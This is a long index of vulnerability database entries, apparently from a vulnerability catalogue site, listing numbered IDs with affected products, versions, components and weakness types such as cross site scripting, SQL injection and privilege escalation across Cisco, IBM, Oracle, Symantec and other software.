TL-R600VPN v2 Web CLI unknown vulnerability [12608] McAfee Web Gateway up to 7.4.0/up to 7.3.2.4/up to 7.2.0.9 Web Filtering Port Dot Dot Sequence directory traversal [12517] Citrix Netscaler 9.3/10.0/10.1 AAA TM vServer User Interface cross site scripting [12508] Cisco CVR100W/RV110W/RV215W Management Interface privilege escalation [12494] Cisco Wireless LAN Controller 4.0/5.0/6.0/7.0 WebAuth Login denial of service [12356] Cisco Unified SIP Phone Test Interface privilege escalation [12354] Cisco Unified Communications Manager 10.0(1.10000.3) Administration Interface privilege escalation [12353] Cisco Unified Communications Manager 10.0(1.10000.3) Real Time Monitoring Tool Web Application weak authentication [12350] Cisco Unified Communications Manager 10.0(1.10000.3) IP Manager Assistant Iinterface cross site scripting [12346] Drupal 6.x-3.2/6.x-3.18 Webform Module cross site scripting [12330] Cisco Secure Access Control System RMI Interface Arbitrary File Read privilege escalation [12315] SAP NetWeaver up to 7.30 WebDyn Pro Portal information disclosure [12308] Joomla CMS 3.2.1 weblinks-categories sql injection [12289] Cisco Unified Communications Manager IP Manager Assistant Interface cross site scripting [12288] Cisco Unified Communications Manager Bulk Administration Interface privilege escalation [12287] Cisco Unified Communications Manager Java Database Interface sql injection [12275] cPanel 11.36.2.9/11.38.2.12/11.40.0.28/11.40.1.2 WHM Interface /scripts/park directory traversal [12270] Symantec Web Gateway 5.1.1 sql injection [12269] Symantec Web Gateway 5.1.1 cross site scripting [12233] Palo Alto PAN-OS 5.0.9/5.1.4 Device Management Interface privilege escalation [12156] Cisco WebEx Meetings Server 1.0/1.1 Account Activation privilege escalation [12155] Cisco WebEx 11.0 SPI Call Arbitrary File Enumeration privilege escalation [12153] Cisco WebEx Social up to 3.4(1) Authentication Session Hijacking cross site request forgery [12152] Cisco WebEx Meetings Server 1.0 Event Center Module Password and Host Keys weak authentication [12151] Cisco WebEx 4.1 Certificate privilege escalation [12150] Cisco WebEx Social 3.0(1) Post URL cross site scripting [12149] Cisco WebEx Social Input Field privilege escalation [12148] Cisco WebEx Meetings Server/WebEx Node Uninitialized Memory privilege escalation [12147] Cisco WebEx User Input Sanitizer privilege escalation [12129] Allegro RomPager Embedded Web Server /rom-0 information disclosure [12091] Cisco WebEx Meetings Server Authorization privilege escalation [12082] Cisco Secure Access Control System Portal Interface privilege escalation [11991] Cisco WebEx Meetings Server 1.5/1.5.1.6/1.5.1.131 Enterprise License Manager Web Portal Cleartext Password privilege escalation [11990] Cisco Secure Access Control System up to 5.4 Remote Method Invocation Interface privilege escalation [11968] IBM WebSphere Application Server up to 7.0.0.30 simpleFileServlet information disclosure [11967] IBM WebSphere Application Server 7.0.0.30 Web Service Endpoint privilege escalation [11966] IBM WebSphere Application Server up to 7.0.0.29/up to 8.0.0.8/8.5.5.1/8.5 Administrative Console Reflected cross site scripting [11923] Oracle Secure Global Desktop up to 4.63 Administration Console/Workspace Web Applications information disclosure [11916] Oracle Solaris 10 Java Web Console unknown vulnerability [11856] Oracle PeopleSoft Enterprise PeopleTools 8.52/8.53 Portal - Web Services unknown vulnerability [11830] Oracle iPlanet Web Proxy Server 4.0 Administration unknown vulnerability [11827] Oracle iPlanet Web Server 6.1/7.0 Security weak encryption [11826] Oracle iPlanet Web Proxy Server 4.0 Security weak encryption [11821] Oracle HTTP Server 11.1.1.6.0/11.1.1.7.0/11.1.2.1 Web Listener cross site scripting [11819] Oracle WebCenter Portal 11.1.1.6.0/11.1.1.7.0/11.1.1.8.0 Page Service unknown vulnerability [11814] Oracle HTTP Server 11.1.1.6.0/11.1.1.7.0/11.1.2.1/12.1.2.0 Web Listener weak encryption [11810] Oracle WebCenter Sites 11.1.1.6.1/11.1.1.8.0 WebCenter Sites Community Configuration [11771] FFmpeg 2.1 libavformat/webvttdec.c webvtt_read_header unknown vulnerability [11638] Courier MTA Webmail Server 0.73 External File System denial of service [11635] Plone up to 4.2 Admin Interface privilege escalation [11620] cPanel WHM 11.36.2.9/11.38.2.12/11.40.0.28/11.40.1.2 Edit DNS Zone Interface cross site scripting [11575] IBM WebSphere Portal 8.0.0/8.0.0.1 Content Template Catalog administrative PAA Installation/Execution privilege escalation [11574] IBM WebSphere Portal 8.0.0.1 Referenced WCM Components privilege escalation [11573] IBM WebSphere Portal up to 7.0.0.2/8.0.0.1 axonomy Individual Categories privilege escalation [11572] IBM WebSphere Portal up to 6.1.0.5/6.1.5.3/7.0.0.1/8.0.0.1 Reflected cross site scripting [11562] IBM WebSphere Portal up to 6.1.5.3/7.0.0.2/8.0.0.1 Web Content Manager privilege escalation [11561] Synology DiskStation Manager 4.0-2257/4.1-2851/4.2-3236/4.3-3810 SliceUpload webman/imageSelector.cgi privilege escalation [11521] IBM WebSphere Service Registry/Repository up to 8.0.0.2 Widgets cross site scripting [11485] TYPO3 up to 6.1.6 Backend User Administration Interface Reflected cross site scripting [11457] Microsoft SharePoint Server/Office Web Apps 2010 SP1/2010 SP2/2013 W3WP Service Account privilege escalation [11216] IBM WebSphere Application Server up to 8.5.5.0 cross site scripting [11215] IBM WebSphere Application Server up to 8.5.5.0 Administrative Console Reflected cross site scripting [11214] IBM WebSphere Application Server up to 8.5.5.0 Reflected cross site scripting [11212] IBM WebSphere Application Server up to 8.0.0.7 Migration Functionality privilege escalation [11177] IBM WebSphere Portal up to 8.0 URL information disclosure [11172] IBM WebSphere Portal 8.0.0/8.0.0.1 Reflected cross site scripting [11171] IBM WebSphere Portal up to 8.0.0.1 Reflected cross site scripting [11145] Microsoft Windows up to XP Graphics Device Interface Numeric Error [11125] IBM Lotus Sametime WebPlayer 8.5.2/8.5.2.1 Sametime Audio Visual memory corruption [11114] Joomla CMS 2.5.14 Web Links Form com_weblinks cross site scripting [11109] IBM Domino 8.5.0/9.0.0.0 Web Application webadmin.nsf cross site request forgery [11108] IBM Domino 8.5.0/9.0.0.0 Web Application webadmin.nsf cross site scripting [11107] IBM Domino 8.5.0/9.0.0.0 Web Application webadmin.nsf cross site scripting [11042] Horde Groupware Webmail Edition 5.1.2 Authentication Manager horde/ingo/basic.php weak authentication [11018] cPanel WHM up to 11.40.0.11 Apache mod_userdir Tweak Interface privilege escalation [11016] cPanel WHM up to 11.40.0.11 Configure Customer Contact Interface privilege escalation [11007] cPanel WHM up to 11.40.0.11 Manage SSL Hosts Interface cross site request forgery [10920] Apple Mac OS X up to 10.8 Kernel Socket Interface Numeric Error [10885] D-Link Router DI/DIR/TM bin/webs RuntimeDiagnosticPing memory corruption [10866] IBM WebSphere DataPower XC10 2.5.0 Access Control privilege escalation [10865] IBM WebSphere DataPower XC10 2.1.0/2.5.0 Session weak authentication [10857] VMware vCenter Server up to 5.0 Update 2 Web Client Server privilege escalation [10856] IBM WebSphere Message Broker up to 8.0.0.3 XML Parser denial of service [10827] Cisco WebEx Meetings Center Virtual Machine Deployment privilege escalation [10807] Oracle Solaris 10 Java Web Console unknown vulnerability [10749] Oracle 8.1/8.2/8.3 Web Access unknown vulnerability [10744] Oracle Health Sciences InForm up to 5.0 SP1 Web unknown vulnerability [10743] Oracle Health Sciences InForm up to 5.0 SP1 Web unknown vulnerability [10742] Oracle Health Sciences InForm up to 5.0 SP1 Web unknown vulnerability [10705] Oracle WebLogic Server 10.3.6.0/12.1.1.0 Web Container directory traversal [10700] Oracle WebCenter Content 10.1.3.5.1/11.1.1.6.0/11.1.1.7.0/11.1.1.8.0 Content Server unknown vulnerability [10601] Cisco NX-OS Nexus 7000 Management Interface privilege escalation [10310] SAP NetWeaver up to 7.30 Web Application directory traversal [10307] VMware Zimbra Collection Suite 6.0.16 Web Application weak authentication [10291] Juniper Junos Pulse Secure Access Service 7.1r14/7.2r10/7.3r5/7.4r2 SSL VPN Web Server cross site scripting [10290] IBM WebSphere Application Server 6.1.0.45/7.0.0.23/8.0.0.4/8.5 privilege escalation [10288] IBM WebSphere Application Server 8.5.5.1 Administrative Console cross site scripting [10287] IBM WebSphere Application Server 8.5.5.1 XML privilege escalation [10286] IBM WebSphere Application Server 8.5.5.1 Administrative Console cross site scripting [10252] Synology DiskStation Manager 4.3-3776 webman/wallpaper.cgi unknown vulnerability [10184] Cisco WebEx up to 28.4 WRF Player memory corruption [10183] Cisco WebEx up to 28.4 WRF Player memory corruption [10182] Cisco WebEx 27.11.26/27.21.10/27.25.10/27.32.1/28.0.0 ARF Player memory corruption [10181] Cisco WebEx 27.11.26/27.21.10/27.25.10/27.32.1/28.0.0 ARF Player memory corruption [10168] IBM WebSphere Application Server 6.1 on z/OS JAX-WS Web Services privilege escalation [10103] IBM WebSphere Commerce up to 7.0.0.6 Search Feature privilege escalation [10082] IBM WebSphere Commerce up to 7.0.0.7 Administration Console cross site scripting [10081] IBM WebSphere Commerce up to 7.0.0.7 Organisation Administration Console cross site scripting [10080] IBM WebSphere Commerce up to 7.0.0.7 Accelerator cross site scripting [10075] IBM WebSphere 8.0.0.0/8.0.0.1/8.0.0.2 Extended Deployment Compute Grid information disclosure [10055] IBM WebSphere Application Server up to 8.5 Administrative cross site scripting [10054] IBM WebSphere Application Server up to 8.5 Administrative cross site scripting [10032] IBM WebSphere Portal up to 8.0 Request privilege escalation [9955] IBM WebSphere Portal 6.1/6.1.5/7.0/8.0 Themes cross site scripting [9920] cPanel WHM 11.34.1.24/11.36.1.14/11.38.1.12/11.39.0.4 Web Host Manager WHM privilege escalation [9919] cPanel WHM 11.34.1.24/11.36.1.14/11.38.1.12/11.39.0.4 Web Host Manager WHM privilege escalation [9792] IBM WebSphere Commerce up to 7.0.0.7 Request Validation weak authentication [9791] IBM WebSphere Commerce up to 7.0 Feature Pack 5 REST Session privilege escalation [9790] IBM WebSphere Application Server up to 8.0.0.4 Property privilege escalation [9787] IBM WebSphere Application Server up to 8.5.0.1 Cookie information disclosure [9785] IBM WebSphere Application Server up to 8.5.0.2 File Permission unknown vulnerability [9784] IBM WebSphere Application Server up to 8.5.0.2 Log unknown vulnerability [9761] Symantec Web Gateway up to 5.1.0 Input Sanitizer spywall/nameConfig.php privilege escalation [9760] Symantec Web Gateway up to 5.1.0 SWG Console privilege escalation [9758] Symantec Web Gateway up to 5.1.0 networkConfig.php privilege escalation [9757] Symantec Web Gateway up to 5.1.0 Transaction cross site request forgery [9756] Symantec Web Gateway up to 5.1.0 spywall/edit_alert.php sql injection [9755] Symantec Web Gateway up to 5.1.0 feedback_report.php sql injection [9754] Symantec Web Gateway up to 5.1.0 Command etc/sudoers privilege escalation [9753] Symantec Web Gateway up to 5.1.0 spywall/blocked.php cross site scripting [9752] Symantec Web Gateway up to 5.1.0 feedback_report.php cross site scripting [9654] Oracle Secure Global Desktop up to 4.63/4.71 Web UI unknown vulnerability [9653] Oracle Secure Global Desktop up to 4.63/4.71 Web UI unknown vulnerability [9621] Oracle Agile PLM Framework 9.3.1 Web Client CS unknown vulnerability [9608] Oracle WebCenter Content 10.1.3.5.1/11.1.1.6.0/11.1.1.7.0 Web Forms unknown vulnerability [9607] Oracle WebCenter Content 10.1.3.5.1/11.1.1.6.0/11.1.1.7.0 Site Studio unknown vulnerability [9606] Oracle HTTP Server 10.1.3.5.0 Web Listener information disclosure [9605] Oracle HTTP Server 10.1.3.5.0 Web Listener memory corruption [9604] Oracle HTTP Server Web Listener denial of service [9603] Oracle HTTP Server Web Listener denial of service [9602] Oracle HTTP Server Web Listener cross site scripting [9601] Oracle HTTP Server 10.1.3.5.0 Web Listener cross site scripting [9600] Oracle HTTP Server 10.1.3.5.0 Web Listener cross site scripting [9599] Oracle HTTP Server 10.1.3.5.0 Web Listener cross site scripting [9597] Oracle HTTP Server 10.1.3.5.0 Web Listener memory corruption [9596] Oracle HTTP Server Web Listener denial of service [9595] Oracle HTTP Server Web Listener denial of service [9593] Oracle Oracle WebCenter Content 10.1.3.5.1/11.1.1.6.0/11.1.1.7.0 Content Server weak encryption [9361] cPanel WHM up to 11.38.0.14 Web Host Manager privilege escalation [9325] IBM WebSphere Application Server up to 7.0.0.27 Transaction administrative cross site request forgery [9324] IBM WebSphere Application Server up to 8.5.0.2 Oauth cross site scripting [9323] IBM WebSphere Application Server up to 8.5.0.2 weak encryption [9321] IBM WebSphere Application Server up to 8.5.0.2 cross site scripting [9274] Cisco Web Security Appliance 7.1/7.5.7.7 Web Framework privilege escalation [9243] IBM WebSphere Cast Iron 6.0.0/6.1/6.3 Appliance Offering privilege escalation [9235] IBM Tivoli Monitoring up to 6.2.3 Web Server privilege escalation [9231] IBM WebSphere Commerce up to 7.0.0.7 Encryption Algorithm information disclosure [8925] IBM WebSphere Portal up to 8.0.0.x Web Content Viewer Portlet cross site scripting [8915] IBM WebSphere Portal up to 8.0 HTTP privilege escalation [8839] IBM WebSphere DataPower up to 5.0.0 cross site scripting [8828] SAP NetWeaver Gateway up to 2.0 SP5 SOAP Interface information disclosure [8813] thttpd 2.25b WebService information disclosure [8621] IBM WebSphere DataPower XC10 up to 2.1 memory corruption [8604] IBM WebSphere Application Server up to 8.0.0.5 WS-Security weak authentication [8558] VMware vCenter Server up to 5.1 Virtual Appliance Management Interface privilege escalation [8556] VMware vCenter Server Appliance up to 5.1 Virtual Appliance Management Interface privilege escalation [8523] IBM WebSphere Application Server up to 8.5.0.1 RPC cross site scripting [8522] IBM WebSphere Application Server up to 8.5.0.1 Input Sanitizer directory traversal [8521] IBM WebSphere Application Server up to 8.5.0.1 Local OS Registry privilege escalation [8520] IBM WebSphere Application Server up to 8.5.0.1 cross site scripting [8518] IBM WebSphere Application Server up to 8.5.0.1 Authentication weak authentication [8463] Linksys WRT310N 2.0.0.1 Management Interface apply.cgi cross site request forgery [8461] D-Link DIR865L 1.03 Management Interface cross site request forgery [8394] Oracle GlassFish Server 3.0.1/3.1.2 REST Interface cross site scripting [8393] Oracle GlassFish Server 3.0.1/3.1.2 ADMIN Interface cross site scripting [8376] Oracle 7.0/8.1/8.2 Web Access unknown vulnerability [8375] Oracle 7.0/8.1/8.2 Web Access unknown vulnerability [8324] Oracle WebCenter Content 11.1.1.6.0 Content Server unknown vulnerability [8323] Oracle WebCenter Content 10.1.3.5.1/11.1.1.6.0 Content Server unknown vulnerability [8322] Oracle WebCenter Sites 7.6.2/11.1.1.6.0/11.1.1.6.1 unknown vulnerability [8321] Oracle WebCenter Content 10.1.3.5.1/11.1.1.6.0 Content Server unknown vulnerability [8320] Oracle WebCenter Capture 10.1.3.5.1 Import Server unknown vulnerability [8318] Oracle WebLogic Server 10.0.2/10.3.5/10.3.6/12.1.1 WebLogic Console unknown vulnerability [8317] Oracle WebLogic Server 10.0.2/10.3.5/10.3.6/12.1.1 WebLogic Console unknown vulnerability [8316] Oracle WebCenter Interaction 6.5.1/10.3.3.0 Image Service unknown vulnerability [8315] Oracle WebCenter Content 10.1.3.5.1/11.1.1.6.0 Content Server unknown vulnerability [8314] Oracle HTTP Server 11.1.1.6.0 Web Listener privilege escalation [8313] Oracle HTTP Server Web Listener memory corruption [8310] Oracle HTTP Server Web Listener information disclosure [8309] Oracle HTTP Server Web Listener information disclosure [8308] Oracle HTTP Server Web Listener denial of service [8307] Oracle HTTP Server 10.1.3.5/11.1.1.5.0/11.1.1.6.0 Web Listener unknown vulnerability [8306] Oracle HTTP Server Web Listener denial of service [8305] Oracle HTTP Server Web Listener privilege escalation [8304] Oracle HTTP Server Web Listener information disclosure [8300] Oracle HTTP Server Web Listener Numeric Error [8299] Oracle HTTP Server Web Listener Numeric Error [8298] Oracle HTTP Server Web Listener denial of service [8246] Juniper Junos 10.4R12/11.4R6/12.1R4/12.2R2 J-Web Sajax file/jsdm/ajax/port.php privilege escalation [8226] Cisco IOS XE up to 3.5 Bridge Domain Interface directory traversal [8136] IBM InfoSphere Information Server up to 8.7 Web Console cross site scripting [8084] IBM Lotus Domino up to 8.5.3 webadmin.nsf cross site scripting [8083] IBM Lotus Domino up to 8.5.3 webadmin.nsf cross site request forgery [8011] Apple Mac OS X 10.8.3 Java Web Start unknown vulnerability [7854] IBM WebSphere Commerce up to 7.0.0.6 Web Service Framework denial of service [7725] SonicWALL Scrutinizer 9.5.2 gadget listing fa_web.cgi sql injection [7704] IBM WebSphere Message Broker up to 8.0 SOAPInput Node WSDL File Requests cross site scripting [7703] IBM WebSphere Cast Iron Cloud Integration up to 6.3 LDAP Authentication denial of service [7702] IBM WebSphere Message up to 8.0 WS-Addressing/WS-Security Requests weak authentication [7701] IBM WebSphere Message up to 8.0 HTTPInput Node memory corruption [7642] Microsoft Exchange 2007/2010 Outlook Web Access vspdx.dll) memory corruption [7461] IBM WebSphere Application Server up to 6.1.0.45/7.0.0.25 Transaction cross site request forgery [7460] IBM WebSphere Application Server up to 6.1.0.45/7.0.0.25 cross site scripting [7459] IBM WebSphere Application Server up to 6.1.0.45/7.0.0.25 Servlet Requests Parser weak encryption [7458] IBM WebSphere Application Server up to 6.1.0.45/7.0.0.25 cross site scripting [7457] IBM WebSphere Application Server up to 6.1.0.45/7.0.0.25 cross site scripting [7395] Oracle Siebel CRM 8.1.1/8.2.2 Highly Interactive Web UI unknown vulnerability [7354] Oracle Fusion Middleware 9.2.4/10.0.2/10.3.5/10.3.6/12.1.1 WebLogic Server privilege escalation [7191] IBM Lotus Notes up to 8.5.3 Web Application information disclosure [7131] Citrix XenApp 6.5.0.0 XML Service Interface memory corruption [7054] IBM WebSphere 7.1.1 WS ILOG RTS cross site scripting [7029] Websense Web Security URL Filter Bypass privilege escalation [7011] IBM WebSphere DataPower XC10 up to 2.1.0.2 weak authentication [7010] IBM WebSphere DataPower XC10 up to 2.1.0.2 JMX Operations privilege escalation [6994] IBM WebSphere 7.0.0.1/7.0.0.2/8.0 IBM WebSphere Portal directory traversal [6962] Mozilla Bugzilla 4.3.2 WebService user.pm information disclosure [6956] Horde Groupware/Groupware Webmail Edition 4.0.8 Portal Blocks privilege escalation [6955] IBM WebSphere Application Server 8.5 cross site scripting [6954] IBM WebSphere Application Server 8.5 JAX-RS privilege escalation [6953] IBM WebSphere Application Server 6.1/7/8/8.5 Administrative Console cross site request forgery [6952] IBM WebSphere Application Server 7/8/8.5 Proxy Server denial of service [6929] Microsoft .NET Framework 2.0 SP2/3.5/3.5.1/4/4.5 Web Proxy Setting Auto-Discovery privilege escalation [6916] IBM WebSphere up to 7.1 Message denial of service [6884] Webmin 1.600 Change Password cross site scripting [6879] IBM WebSphere DataPower 2.1.x/8.5.x Server-to-Server Communication weak encryption [6878] IBM WebSphere DataPower 2.1.x/8.5.x Secret Token Transmission weak encryption [6843] Juniper Junos up to 11.4R3-S3/11.4R4/12.1R2-S1/12.1R3 Web-Authentication Policy Enforcement privilege escalation [6709] Oracle Fusion Middleware up to 6.3.x/7.0.3/7.6.2/11.1.1.6.0 WebCenter Sites cross site request forgery [6701] Oracle Fusion Middleware up to 6.3.x/7.0.3/7.6.2/11.1.1.6.0 WebCenter Sites cross site request forgery [6700] Oracle Fusion Middleware up to 6.3.x/7.0.3/7.6.2/11.1.1.6.0 WebCenter Sites cross site request forgery [6699] Oracle Fusion Middleware up to 6.3.x/7.0.3/7.6.2/11.1.1.6.0 WebCenter Sites cross site request forgery [6697] Oracle Fusion Middleware 9.2.4.0/10.0.2.0/10.3.5.0/10.3.6.0/12.1.1.0 WebLogic Server weak authentication [6678] Cisco WebEx Recording Format Player T27/T28 WRF File memory corruption [6672] Cisco WebEx Recording Format Player T27/T28 WRF File memory corruption [6671] Cisco WebEx Recording Format Player T27/T28 WRF File memory corruption [6670] Cisco WebEx Recording Format Player T27/T28 WRF File memory corruption [6669] Cisco WebEx Recording Format Player T27/T28 WRF File memory corruption [6575] IBM WebSphere up to 7.0.0.6 information disclosure [6567] Cisco IOS up to 12.2/15.2 Tunnel Interface denial of service [6562] Novell GroupWise 2012/8.0/8.00/8.01/8.02 HTTP interfaces directory traversal [6561] Novell GroupWise 2012/8.0/8.00/8.01/8.02 WebAccess cross site scripting [6547] IBM WebSphere Application Server up to 8.5 Multidomain Support privilege escalation [6546] IBM WebSphere Application Server up to 8.5 Administrative Console weak authentication [6545] IBM WebSphere Application Server up to 8.5 Application Runtime directory traversal [6544] IBM WebSphere MQ up to 7.5 Server Message Channel Agent denial of service [6536] Novell GroupWise 8.0/8.00 WebAccess cross site scripting [6122] Jamie Cameron Webmin up to 1.590 file/show.cgi open privilege escalation [6121] Jamie Cameron Webmin up to 1.590 file/edit_html.cgi weak authentication [6119] Jamie Cameron Webmin up to 1.590 status/edit_mon.cgi privilege escalation [6118] Jamie Cameron Webmin up to 1.590 status/save_mon.cgi privilege escalation [6096] Websense Web Security up to 7.6.2 privilege escalation [6095] Websense Email Security up to 7.3 SMTP information disclosure [6081] Digium Asterisk up to 1.8.15.0/10.7.0 Manager Interface main/manager.c privilege escalation [6024] IBM WebSphere 6.1.0.43/7.0.0.23/8.0.0.3/8.5 Global Security Kit (GSKit) weak encryption [6012] McAfee E-Mail/Web Security 5.5 Patch 6/5.6 Patch 3 Reflected cross site scripting [6010] McAfee E-Mail/Web Security 5.5 Patch 6/5.6 Patch 3 weak authentication [5983] IBM Lotus Domino up to 8.5.3 WebMail UI/Domino Help /help/lccon.nsf/ cross site scripting [5974] IBM WebSphere MQ 7.0.3/7.0.4/7.5 cross site request forgery [5973] IBM WebSphere MQ 7.0.3/7.0.4 privilege escalation [5915] IBM WebSphere Application Server up to 8.0.0.4 cross site scripting [5913] Symantec Web Gateway up to 5.0.3.18 deptUploads_data.php sql injection [5795] IBM WebSphere MQ up to 7.1 SVRCONN privilege escalation [5792] Symantec Web Gateway up to 5.0.3.18 spywall/ldap_latest.php sql injection [5791] Symantec Web Gateway up to 5.0.3 privilege escalation [5790] Symantec Web Gateway up to 5.0.3 privilege escalation [5789] Symantec Web Gateway up to 5.0.3.18 spywall/pbcontrol.php privilege escalation [5788] Symantec Web Gateway up to 5.0.3 spywall/languageTest.php privilege escalation [5787] Symantec Web Gateway up to 5.0.3 spywall/blocked.php sql injection [5763] Oracle Oracle iPlanet Web Server 6.1/7.0 denial of service [5746] Oracle Siebel CRM 8.1.1/8.2.2 Web UI unknown vulnerability [5640] IBM WebSphere 7.0.0.1/7.0.0.2/8.0 directory traversal [5636] Microsoft Outlook Web App up to 14.1.287.0 owa/redir.aspx weak authentication [5627] Cisco WebEx Recording Format Player up to 28.0.0 (T28 L10N) memory corruption [5626] Cisco WebEx Recording Format Player up to 28.0.0 (T28 L10N) memory corruption [5625] Cisco WebEx Recording Format Player up to 28.0.0 (T28 L10N) memory corruption [5624] Cisco WebEx Recording Format Player up to 28.0.0 (T28 L10N) memory corruption [5621] Symantec Web Gateway 5.0.2.8 Perl spywall/adminConfig.php exec privilege escalation [5618] Horde IMP Webmail Client up to 5.0.21 cross site scripting [5584] Red Hat JBoss Enterprise 5.1.1 WebPermissionMapping Permissions privilege escalation [5577] Cisco AnyConnect Secure Mobility Client up to 3.0 VPN Downloader WebLaunch privilege escalation [5565] IBM WebSphere Application Server up to 8.5 iehs.war privilege escalation [5476] IBM WebSphere Application Server up to 8.0 Snoop Servlet privilege escalation [5467] Horde IMP Webmail 4.0.7 Message Page cross site scripting [5466] Horde IMP Webmail 4.0.7 Minimal Mailbox Page cross site scripting [5465] Horde IMP Webmail 4.0.7 Tasks View Page cross site scripting [5464] Horde IMP Webmail 4.0.7 Search View Page cross site scripting [5463] Horde IMP Webmail 4.0.7 Dynamic Compose Page cross site scripting [5438] Symantec Web Gateway up to 5.0.2 cross site scripting [5397] Avsoft Kerio WinRoute Firewall 5 Embedded Web Server information disclosure [5391] Symantec Web Gateway spywall/timer.php cross site scripting [5300] Oracle Siebel Clinical up to 8.2.2.x Web UI unknown vulnerability [5201] Oracle GlassFish Enterprise Server 3.0.1/3.1.1 Web Container denial of service [5200] Oracle GlassFish Enterprise Server Web Container privilege escalation [5197] Oracle Fusion Middleware up to 10.3.5 WebLogic Server cross site scripting [5196] Oracle Fusion Middleware up to 10.3.5 WebLogic Server denial of service [5195] Oracle Fusion Middleware up to 11.1.1.5 WebCenter Content Reflected cross site scripting [5194] Oracle Fusion Middleware up to 11.1.1.5 WebCenter Content sql injection [5193] Oracle Fusion Middleware 7.5.2/10.1.3.5.1 WebCenter Content Reflected cross site scripting [5192] Oracle Fusion Middleware up to 11.1.1.5 Web Services Manager information disclosure [5191] Oracle Fusion Middleware up to 11.1.1.5 Web Services Manager unknown vulnerability [5190] Oracle Fusion Middleware up to 11.1.1.5 Web Services Manager unknown vulnerability [5177] McAfee Web Gateway 7.0 HTTP Header Host Field Parser privilege escalation [5174] Oracle Fusion Middleware 10.1.3.5 WebCenter Forms Recognition unknown vulnerability [5173] Oracle Fusion Middleware 10.1.3.5 WebCenter Forms Recognition memory corruption [5152] Oracle Siebel Clinical up to 8.2.2.x Web UI unknown vulnerability [5150] Oracle Siebel Clinical up to 8.2.2.x Web UI unknown vulnerability [5127] Oracle GlassFish Enterprise Server 3.1.1 Web Container realms.jsf cross site scripting [5126] Oracle GlassFish Enterprise Server 3.1.1 Web Container cross site scripting [5090] Oracle iPlanet Web Server 7 Administration Console cross site scripting [5079] Cisco WebEx Player up to 27.32.0 WRF File memory corruption [5078] Cisco WebEx Player up to 27.32.0 WRF File atas32.dll memory corruption [5077] Cisco WebEx Player up to 27.32.0 WRF File atdl2006.dll memory corruption [5023] IBM Tivoli Directory Server Web Admin Tool cross site scripting [5012] TYPO3 up to 4.6.6 Command Line Interface information disclosure [4879] Barracuda Web Application Firewall 600 v7.6.0.028 information disclosure [4857] McAfee Email/Web Security 5.5/5.6/7.0 Management Console weak authentication [4856] McAfee Email/Web Security 5.5/5.6/7.0 privilege escalation [4855] McAfee Email/Web Security 5.5/5.6/7.0 privilege escalation [4854] McAfee Email/Web Security 5.5/5.6/7.0 Backup Password Encryption weak encryption [4853] McAfee Email/Web Security 5.5/5.6/7.0 Dashboard information disclosure [4852] McAfee Email/Web Security 5.5/5.6/7.0 Password Reset privilege escalation [4851] McAfee Email/Web Security 5.5/5.6/7.0 cross site scripting [4840] VMware vCenter 4.0/4.1 Web Configuration Tool vCenter information disclosure [4828] IBM Tivoli Endpoint Manager up to 8.x Web Reports cross site scripting [4680] VMware Zimbra Web Client zimbra/h/calendar cross site scripting [4674] IBM WebSphere WS-Security Enabled JAX-WS Applications cross site scripting [4635] Microsoft SharePoint 2010 themeweb.aspx cross site scripting [4587] Red Hat JBoss 5.1/5.1.0/5.1.2 Web Surrogate Pair Character memory corruption [4556] IBM WebSphere Application Server privilege escalation [4551] IBM WebSphere Application Server up to 7.0.0.20 on z/OS Web Messaging cross site scripting [4550] IBM WebSphere Application Server up to 7.0.0.20 on z/OS WS-Security Policy cross site scripting [4529] IBM WebSphere Application Server Tomcat Container denial of service [4500] phpMyAdmin up to 3.4.8.0 Setup Interface ConfigFile.class.php cross site scripting [4468] Linux Kernel 2.6.18 OMAP4 Bridge Networking Interface denial of service [4390] Microsoft Windows Server 2008 Remote Desktop Web Access cross site scripting [4354] SonicWALL SSL-VPN VirtualOffice up to 4.0 Webfrontend cross site scripting [4344] Horde IMP Webmail 4.x cross site scripting [4260] IBM WebSphere up to 7.0.0.0 information disclosure [4254] IBM WebSphere up to 7.0.1.3 MQ Message memory corruption [4224] Microsoft Windows 7/Server 2008/Vista Consent User Interface privilege escalation [4075] IBM Lotus iNotes 8.5.x Web Access cross site scripting [4000] Microsoft Office 2003/Sp3/Xp Web Components privilege escalation [3956] Oracle BEA WebLogic 7.x Portal denial of service [3955] Oracle BEA WebLogic Portal 8.x privilege escalation [3778] Microsoft Exchange 2003/2007 Outlook Web Access cross site scripting [3645] Sun Java JRE/JDK Java Web Start 7PK Security Features [3641] Sun Java JRE/JDK Java Web Start privilege escalation [3640] Sun Java JRE/JDK Java Web Start privilege escalation [3639] Sun Java JRE/JDK Java Web Start memory corruption [3566] IBM AIX 5.2/5.3/6.1 WebSM memory corruption [3560] IBM WebSphere Application Server 6.0.x/6.1.x serveServletsByClassnameEnabled unknown vulnerability [3491] Microsoft Web Proxy Auto-Discovery Feature unknown vulnerability [3490] Citrix Netscaler 8.0 Build 47.8 Web Management cross site scripting [3474] IBM WebSphere Application Server 6.1.x denial of service [3473] IBM WebSphere Application Server 6.1.x mod_proxy denial of service [3465] IBM WebSphere Application Server 6.1.x WebContainer cross site scripting [3433] IBM Lotus Domino 7.x Web Server cross site scripting [3414] Apache Tomcat WebDAV Stored directory traversal [3391] IBM WebSphere Application Server 5.x/6.x unknown vulnerability [3336] Sun Solaris 8.0/9.0/10.0 Human Interface Device denial of service [3334] Barracuda Spam Firewall Monitor Web Syslog cross site scripting [3300] IBM WebSphere Application Server cross site scripting [3165] SAP Web Application Server Internet Communication Manager denial of service [3148] IBM WebSphere Application Server 6.1.x Web Container Output information disclosure [3138] IBM WebSphere Application Server 6.1.x pdtools memory corruption [3137] IBM WebSphere Application Server 6.1.x Authorization weak authentication [3136] IBM WebSphere Application Server 6.1.x Messaging denial of service [3111] Jamie Cameron Webmin 1.280/1.340 pam_login.cgi cross site scripting [3072] IBM WebSphere Application Server 6.1.0.7 Java Message Service memory corruption [3023] Sun Solaris 10.0 Java Web Console Format String [2985] IBM WebSphere Application Server 6.0.x HTTP Response cross site scripting [2982] IBM WebSphere Application Server 6.1.x JSP File privilege escalation [2934] MailEnable Web Mail Client unknown vulnerability [2877] Symantec Web Security up to 3.0.1.85 Error Message cross site scripting [2860] BEA WebLogic 8.1 JRockit memory corruption [2859] BEA WebLogic 8.1 Profile unknown vulnerability [2858] BEA WebLogic 8.1 Sockets denial of service [2857] BEA WebLogic 8.1 HTTP Request denial of service [2856] BEA WebLogic 8.1 HTTP Request unknown vulnerability [2855] BEA WebLogic 8.1 EJB unknown vulnerability [2854] BEA WebLogic 8.1 EJB unknown vulnerability [2851] BEA WebLogic 8.1 web.xml denial of service [2850] BEA WebLogic 8.1 Backup config.xml weak encryption 